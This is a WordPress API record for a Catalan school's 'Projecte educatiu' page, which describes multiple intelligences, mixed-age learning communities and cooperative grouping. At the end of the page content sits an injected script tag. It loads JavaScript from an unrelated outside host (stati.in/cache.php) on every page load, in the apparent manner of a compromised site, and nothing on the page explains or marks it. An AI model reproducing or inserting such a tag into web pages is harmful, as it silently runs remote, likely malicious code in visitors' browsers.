{"id":685,"date":"2014-09-18T12:39:08","date_gmt":"2014-09-18T11:39:08","guid":{"rendered":"http:\/\/agora.xtec.cat\/ceipbernatdeboil\/?page_id=64"},"modified":"2014-09-18T12:39:08","modified_gmt":"2014-09-18T11:39:08","slug":"projecte-educatiu-2","status":"publish","type":"page","link":"https:\/\/agora.xtec.cat\/ietiler\/projecte-educatiu-2\/","title":{"rendered":"Projecte educatiu"},"content":{"rendered":"<p>La proposta pedag\u00f2gica del nostre centre est\u00e0 enfocada a atendre totes les intel\u00b7lig\u00e8ncies. Cada nen i cada nenai les pot desenvolupar totes fins a assolir un bon nivell de compet\u00e8ncia, per\u00f2 volem destacar els punts forts o &#8220;dons&#8221; de cada infant.<br \/>\nEn aquesta l\u00ednia ens fem dir Comunitat de Petits , Comunitat de Mitjans i Comunitat de Grans.Tres grups d\u2019edat som un col.lectiu de persones que compartim espais d&#8217; aprenentatge promovent el treball cooperatiu entre els nens i nenes:<br \/>\n. En la composici\u00f3 dels grups heterogenis, amb menor nombre de nens i nenes.<br \/>\n. En l&#8217;organitzaci\u00f3 de la tasca i de les activitats des de les coordinacions del equip de Mestres que l\u2019integren<br \/>\n. En la implicaci\u00f3 de totes les participants.<br \/>\n. En la revisi\u00f3 constant dels procesos i la possibilitat de poder refer els plantejaments.<br \/>\nLa tipologia d&#8217;agrupaments poden ser: per ambients, per tallers, per racons, per calaixets.. Cada Comunitat escull la m\u00e9s adient en relaci\u00f3 a la proposta pedag\u00f2gica.<\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La proposta pedag\u00f2gica del nostre centre est\u00e0 enfocada a atendre totes les intel\u00b7lig\u00e8ncies. Cada nen i cada nenai les pot desenvolupar totes fins a assolir un bon nivell de compet\u00e8ncia, per\u00f2 volem destacar els punts forts o &#8220;dons&#8221; de cada infant.<br \/>\nEn aquesta l\u00ednia ens fem&hellip;  <a href=\"https:\/\/agora.xtec.cat\/ietiler\/projecte-educatiu-2\/\" title=\"Read Projecte educatiu\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/side-menu.php","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-685","page","type-page","status-publish","hentry"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/pages\/685","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/comments?post=685"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/pages\/685\/revisions"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/media?parent=685"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}